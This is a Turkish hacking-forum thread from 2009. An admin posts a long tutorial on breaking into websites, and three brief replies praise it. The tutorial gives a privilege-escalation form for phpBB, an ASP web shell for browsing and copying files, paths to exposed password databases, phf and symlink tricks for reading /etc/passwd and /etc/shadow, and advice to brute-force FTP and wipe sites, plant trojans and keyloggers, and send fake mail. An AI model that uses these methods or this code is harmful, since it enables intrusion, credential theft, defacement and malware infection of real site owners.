qwe

Would you like to react to this message? Create an account in a few clicks or log in to continue.
YeNiDeN SizLeRLeYiZ Smile

3 posters

    Geniş Anlatımlı Hack!..

    admin
    admin
    WwW.FixyFactEmpire.CoM -- > Administrator
    WwW.FixyFactEmpire.CoM -- > Administrator


    Mesajlarım : 73

    Kayıt tarihi : 08/10/09

    Reputation Point : 189

    İsim : Nolemania

    Cinsiyet : Erkek

    Yaş : 31

    Doğum tarihi : 16/11/92

    Nerden : Antalya

    FF-Admin Geniş Anlatımlı Hack!..

    Mesaj tarafından admin Salı Kas. 10, 2009 8:47 pm

    Bir siteyi hacklemek için kullanabileceginiz birçok yöntem var.Bunlardan bazilari:

    *Güvenlik Aciklari(asp,php,cgi,phf vb. gibi)

    *Exploitler

    *Fso(NtDaddy),listpathler

    *Bruteforce

    *Wordlist

    *Birebir Baglanti(trojanlar vs)

    *Fakemail

    *Flood

    Simdi bunlari teker teker inceleyelim:

    _____GUVENLIK ACIKLARI:_____

    Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
    kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
    Ornek olarak Webwiz forumlarini ele alalim:
    [Linkleri görebilmek için üye olun veya giriş yapın.] olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
    bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
    Snitz forumlarda da ayni islem mümkün.Mdb ye

    Kod:
    [Linkleri görebilmek için üye olun veya giriş yapın.]
    adresinden ulasabilirsiniz.
    son olarak asp nuke sistemlerde

    Kod:
    [Linkleri görebilmek için üye olun veya giriş yapın.]
    den database'e ulasabilirsiniz.
    Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
    bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
    bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
    Kod:

    /db/main.mdb
    /db/uyeler.mdb
    /db/members.mdb
    /db/sifreler.mdb gibi
    Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
    Bu tarayicilardan en yaygin olanlari

    Kod:
    .N-Stealth
    .Whisker
    .Retina
    .twwwscan
    .m3hm3t's CGI scanner'dır.


    Php Sistemlerinin aciklari:
    Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
    /ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
    bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
    anlamaniza yardimci olacagina inaniyorum.

    Kod:
    <form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">

    <p>User Level : <select name="userlevel">
    <option value="admin" selected="selected">Administrator</option>
    <option value="user">User</option>
    </select></p>
    <input type="hidden" name="private[1]" value="0" />
    <input type="hidden" name="moderator[1]" value="0" />
    <input type="hidden" name="mode" value="user" />
    <input type="hidden" name="adv" value="" />
    User ID: <input type="text" name="u" size="5"> <BR>
    <input type="submit" name="submit" value="Submit" class="mainoption" />
    <input type="reset" value="Reset" class="liteoption" name="reset" />

    </form>
    </body>
    </html>


    Cgi scriptleri acigi:
    WEBBS de bulunan bir acik.

    Kod:
    http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/

    Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
    Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
    Açık : [Linkleri görebilmek için üye olun veya giriş yapın.]

    WWWBoard scriptleri:
    Açık : [Linkleri görebilmek için üye olun veya giriş yapın.]
    Açık : [Linkleri görebilmek için üye olun veya giriş yapın.]
    Açık : [Linkleri görebilmek için üye olun veya giriş yapın.]

    Biraz da phfden bahsetmek istiyorum:
    96'da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
    [Linkleri görebilmek için üye olun veya giriş yapın.] tc/passwd yaziyoruz browsera.ENTER dedigimizde
    error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
    passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
    Örnek vermek gerekirse:
    www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
    yada
    www-admin:*💯11:WWW administrator:/home/Common/WWW:/bin/csh
    gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.

    _____EXPLOİTLER:_____

    Çok kullanicili isletim sistemlerinde,sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
    exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT'de administrator,Novell'da
    supervisor,UNIX de clone yada root olarak siralanabilir.İki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
    kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
    Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır.
    Cok yakinda bir cok exploiti TuzakONLINE.com'da bulabileceksiniz.
    Bagzi örnek exploitler vermek istiyorum :
    "overflow" exploiti (FreeBSD'de lprm açığı):Overflow exploitler [Linkleri görebilmek için üye olun veya giriş yapın.] adresinde bol bol bulunmaktadir.Pointer
    artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon
    belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir
    yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir
    iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root"
    erişimi sağ..ır. Lokal bir exploittir.
    Derleyici ve /tmp Hataları (Solaris'de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
    /tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link
    (bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows'taki .lnk dosyaları gibi) oluşturulur ve bu
    linkten yararlanarak lokal root hakkı alınır.
    Program Hataları (Linux'daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur.
    Bu hatayı linux'ta şöyle kullanabilirsiniz:
    mkdir ~/.x11amp
    ln -s /etc/shadow ~/.x11amp/ekl
    Bu komutları yazdıktan sonra X11Amp'i çalıştırıp "ekl" 'yi seçin bütün girişleri seçip silin. Program çakılacak ve
    /etc/shadow dosyasını alabileceksiniz.
    Microsoft'un FrontPage Server Extensions'unda karşılaşı.. açıklar: Frontpage extensions'un kullanıldığı web sitelerinde
    pek çok açık bulmak mümkün, örneğin Frontpage 98'de dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini
    "WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
    Exploit uygulamali kullanimi icin size ayrica bir döküman hazirlayacagim.

    _____FSO(NTDADDY),LISTPATH:______
    Çoğumuz elmali şeker yada sadece şeker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
    domainlere erişim hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
    yaramaz.Yeni listhpathler icin sık sık hack sitlerini ziyaret etmenizi öneririm.Çok yakinda üzerinde oynamalar yaptigim
    süper bi şekeri tuzakonline.com da piyasaya sürücem.Simdilik bekleyin.Bu methodun bütün hostlarda calismasi konusunda
    garanti veremem.Ama size su an icin kullanabileceginiz bir kac FSO kodunu cok yakinda sitede yayinlayacagim.Buna özel
    ayri bir döküman da sitemizde mevcuttur(by alca.).
    Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin

    Kod:
    <%@ Language=VBscript %>
    <%
    Option Explicit

    Dim giCount
    Dim gvAttributes

    Dim Ext

    Dim scriptFolder
    Dim FolderPath

    Dim FileSystem
    Dim Drives
    Dim Drive
    Dim Folders
    Dim Folder
    Dim SubFolders
    Dim SubFolder
    Dim Files
    Dim File

    Dim BgColor, BackgroundColor,FSO

    If Request.QueryString("CopyFolder") <> "" Then
    Set FSO = CreateObject("scripting.FileSystemObject")
    FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*", "d:"
    End If

    If Request.QueryString("CopyFile") <> "" Then
    Set FSO = CreateObject("scripting.FileSystemObject")
    FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"),
    "d:"
    End If

    Set FileSystem = Server.CreateObject("scripting.FileSystemObject")

    FolderPath = Request.QueryString("FolderPath")

    If FolderPath = "" Then
    FolderPath = Request.ServerVariables("PATH_TRANSLATED")
    End If

    FolderPath = ParseFolder(FolderPath)

    scriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLAT ED")) & "images"

    %>
    <html>
    <head>
    <title>Remote Explorer</title>
    <style type="text/css">
    BODY
    {
    BACKGROUND-COLOR: #C0C0C0
    FONT-FAMILY: 'MS Sans Serif', Arial;
    FONT-SIZE: 8px;
    MARGIN: 0px
    }
    TD,INPUT,SELECT
    {
    FONT-FAMILY: 'MS Sans Serif', Arial;
    FONT-SIZE: 8px;
    }
    .Address
    {
    BACKGROUND-ATTACHMENT: fixed;
    BACKGROUND-POSITION: 1px center;
    BACKGROUND-REPEAT: no-repeat;
    Padding-LEFT: 10px
    }
    .Go
    {
    BACKGROUND-ATTACHMENT: fixed;
    BACKGROUND-POSITION: left center;
    BACKGROUND-REPEAT: no-repeat;
    Padding-LEFT: 10px
    }
    </style>
    </head>
    <body bgcolor="#c0c0c0">
    <table width="100%" cellpadding="0" cellspacing="0" border="0">
    <tr>
    <form>
    <td width="1%" nowrap>
    <select name="FolderPath" id="Drive">
    <%
    Set Drives = FileSystem.Drives
    For Each Drive In Drives
    Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
    If InStr(UCase(FolderPath), Drive.DriveLetter & ":") > 0 Then Response.Write "
    selected"
    Response.Write ">"
    Response.Write Drive.DriveLetter & " - "
    If Drive.DriveType = "Remote" Then
    Response.Write Drive.ShareName & " [share]"
    ElseIf Drive.DriveLetter <> "A" Then
    If Drive.IsReady Then
    Response.Write Drive.VolumeName
    Else
    Response.Write "(Not Ready)"
    End If
    Else
    Response.Write "(Skiped Detection)"
    End If
    Response.Write "</OPTION>"
    Next
    %>
    </select> <input class="Go" type="submit" value="Go" style="border:1px outset">
    </td>
    </form>
    <td width="1%"> Address: </td>
    <form>
    <td width="100%">
    <input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
    style="width:100%">
    </td>
    <td width="1%">
    <input class="Go" type="submit" value="Go"style="border:1px outset">
    </td>
    </form>
    </tr>
    </table>
    <%
    Set Folder = FileSystem.GetFolder(FolderPath)
    Set SubFolders = Folder.SubFolders
    Set Files = Folder.Files
    %>
    <br>
    <table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
    style="border:1px inset">
    <tr>
    <td width="40%" height="20" bgcolor="silver"> Name</td>
    <td width="10%" bgcolor="silver" align="right">Size </td>
    <td width="20%" bgcolor="silver">Type </td>
    <td width="20%" bgcolor="silver">Modified </td>
    <td width="10%" bgcolor="silver" align="right">Attributes </td>
    </tr>
    <%
    If Not Folder.IsRootFolder Then
    BgToggle
    %>
    <tr title="Top Level">
    <td bgcolor="<%=BgColor%>"><a href=
    "<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder.Drive
    & "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    </tr>
    <%BgToggle%>
    <tr>
    <td bgcolor="<%=BgColor%>"><a href=
    "<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder)%>"><font
    face="wingdings" size="4">¶</font> Up One Level</a> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"> </td>
    </tr>
    <%
    End If
    For Each SubFolder In SubFolders
    BgToggle
    %>
    <tr>
    <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
    "<%=Request.ServerVariables("script_name") & "?FolderPath=" &
    Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
    size="4">0</font> <%=SubFolder.Name%></a> (<a href=
    "<%=Request.ServerVariables("script_name")%>?C opyF olde r=<%=Server.URLPathEncode(FolderPath
    & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
    </td>
    <td bgcolor="<%=BgColor%>"> </td>
    <td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
    <td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
    <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)% > </td>
    </tr>
    <%
    Next
    For Each File In Files
    BgToggle
    Ext = FileExtension(File.Name)
    %>
    <tr>
    <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
    "showcode.asp?f=<%=File.Name%>&FolderPath=<%=S e rver.URLPathEncode(FolderPath)%>"
    target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
    href=
    "<%=Request.ServerVariables("script_name")%>?C opyF ile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
    & "")%>">Copy</a> </td>
    <td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
    <td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; amp; gt;
    <td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
    <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
    </tr>
    <%Next%>
    </table>
    </body>
    </html>
    <%
    Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
    MinUpperBound, ByVal IndexSeperator)
    Dim lsResult
    Dim llTemp
    Dim giCount
    MaxValuePerIndex = MaxValuePerIndex + 1
    Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
    - 1)
    MinUpperBound = MinUpperBound + 1
    Loop
    For giCount = MinUpperBound To 0 Step -1
    llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
    lsResult = lsResult & CStr(llTemp)
    If giCount > 0 Then lsResult = lsResult & IndexSeperator
    SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
    Next
    ConvertBinary = lsResult
    End Function

    Private Sub BgToggle()
    BackgroundColor = Not(BackgroundColor)
    If BackgroundColor Then
    BgColor = "#efefef"
    Else
    BgColor = "#ffffff"
    End If
    End Sub

    Private Function Attributes(AttributeValue)
    Dim lvAttributes
    Dim lsResult
    lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
    If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
    If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
    If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
    If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
    Attributes = lsResult
    End Function

    Private Function FileExtension(FileName)
    Dim lsExt
    Dim liCount
    For liCount = Len(FileName) To 1 Step -1
    If Mid(FileName, liCount, 1) = "." Then
    lsExt = Right(FileName, Len(FileName) - liCount)
    Exit For
    End If
    Next
    If Not FileSystem.FileExists(scriptFolder & "ext_" & lsExt & ".gif") Then
    lsExt = ""
    End If
    FileExtension = lsExt
    End Function

    Private Function ParseFolder(PathString)
    Dim liCount
    If Right(PathString, 1) = "" Then
    ParseFolder = PathString
    Else
    For liCount = Len(PathString) To 1 Step -1
    If Mid(PathString, liCount, 1) = "" Then
    ParseFolder = Left(PathString, liCount)
    Exit For
    End If
    Next
    End If
    End Function
    %>

    _____Brute Force:_____

    Bu teknik icin öncelikle dua edin ki ftp sifresi az haneli olsun.Brute force icin kullanabileceginiz program Brutus AET2 dir
    ki bu tuzakonline.com'da mevcuttur.Brute force un mantigi cok basittir.Brutus olabilecek kombinasyonlari cok hizli bir
    sekilde dener.Ama bu özellikle sifre cok haneliyse ki muhtemelen öyledir,çok uzun zaman alir.Başariya ulasma olasiligi
    düşük olsa bile buldugu sifre nin calismama olasiligi yoktur .Size FTP sifresini verir.Buldugunuz sifre ile bence tüm
    dosyalari silin kendi hazirladiginiz indexi koyun.

    _____Wordlist:_____


    Wordlistler icinde bir cok sözcügün bulundugu basit dosyalardir.Siz brute forcerlarla cok hizli bir sekilde elinizdeki
    wordlistteki kelimeleri denersiniz.Wordlistler tahminen 5-10 bin kelimeden olusurlar ve eger elde etmeye calistiginiz ftp
    sifresi bu wordlistler icindeyse sifreyi bulursunuz.Basariya ulasma olasiligi düsüktür.uldugu sifre nin calismama olasiligi
    yoktur

    _____Birebir Baglanti(trojanlar vs):_____

    Lamer teknigidir bastan söylemem gerekli .Sitenin sahibiyle kurdugunuz basarili bir muhabbet sonucu elinizdeki trojan
    serverini bence bir dosya ile birlestirip karsinizdaki kullaniciya yollayin.Site sahibinin makinasina baglandiktan sonra
    bilgisayarina bir keylogger atin.Belirli araliklarla bilgisayarina girip log dosyasini kendi bilgisayariniza cekin.
    Arada sitesinin passwordunu bulabilirsiniz.Bir diğer yöntem de Turkojan kullanarak mümkündür ki o daha saglikli dir.
    Adamin bilgisayarina baglanip keyloggera calistirin .Sonra onunla sohbet edip bir sekilde sitesine ftp den erismesini
    saglayin.Nasilsa sifresini girecektir.Sifresizce
    not:Adamin sifreleri bilgisayarindaki password managerlarda kayitliysa yöntem basarisiz olur .Zaten eger basarili bir
    webmastersa büyük ihtimalle serveri yemez .Site HTML falansa acik kullanamiyorsaniz deneyeblirsiniz.

    _____Fakemail:_____

    Selamlar.Mail site sahibi bakimindan büyük önem tasir.Genelde kullanilan Lame teknik adamin mailini hackleme hosttan sifre
    istetmektir.Yine de denenebilen opsiyonlar arasindadir.Siteye Whois Cekip client maili(webmaster) hacklemeye calisin.
    Hotmail,yahoo,usa.net,mynet fakemail kodlarini asagi yukari köklü her forumdan kolayca telep edebilirsiniz.İcine lycostan bi
    mail form kodu koyarsaniz rahatca adama fake atabilirsiniz.Fakat eger adamin maili POP3 falansa ki eger
    [Linkleri görebilmek için üye olun veya giriş yapın.] ise muhtemelen öyledir tavsiyem kendi fake kodunuzu yazmanizdir.Biraz coderlık bilen herkes cok
    rahatca kendi fake kodunu yazabilir.Bana mail atin bagzi irc serverlari,icq,bazi mail serverlari ve diger pop3 hesaplarini
    kandirmak icin size kendi özel fake kodlarimi yollarim.
    OrJiNaLPeacH
    OrJiNaLPeacH
    WwW.FixyFactEmpire.CoM -- > Yeni Uye

    WwW.FixyFactEmpire.CoM -- > Yeni Uye


    Mesajlarım : 21

    Kayıt tarihi : 06/11/09

    Reputation Point : 56

    İsim : OrJiNaLPeacH

    Cinsiyet : Erkek

    Nerden : TahtaLı Köyden geLcenmi ?

    FF-Admin Geri: Geniş Anlatımlı Hack!..

    Mesaj tarafından OrJiNaLPeacH Salı Kas. 10, 2009 8:50 pm

    Güsel ama cok Uzun xD
    ßy_1Lq3R
    ßy_1Lq3R
    WwW.FixyFactEmpire.CoM -- > Yeni Uye

    WwW.FixyFactEmpire.CoM -- > Yeni Uye


    Mesajlarım : 8

    Kayıt tarihi : 15/10/09

    Reputation Point : 8

    İsim : By_1Lq3R

    Cinsiyet : Erkek

    Yaş : 33

    Doğum tarihi : 12/11/90

    Nerden : Evden

    FF-Admin Geri: Geniş Anlatımlı Hack!..

    Mesaj tarafından ßy_1Lq3R C.tesi Ara. 12, 2009 12:05 pm

    GüzeL bir Paylasım Ama Cok Uzun xD
    Anonymous
    Misafir
    Misafir


    FF-Admin Geri: Geniş Anlatımlı Hack!..

    Mesaj tarafından Misafir Paz Ara. 13, 2009 12:04 pm

    Tabikide güzel paylaşım bu konu için biraz zamanınızı ayırın eminim bikaç şey hacklersiniz...

      Similar topics

      -

      Forum Saati Perş. Mart 28, 2024 7:59 pm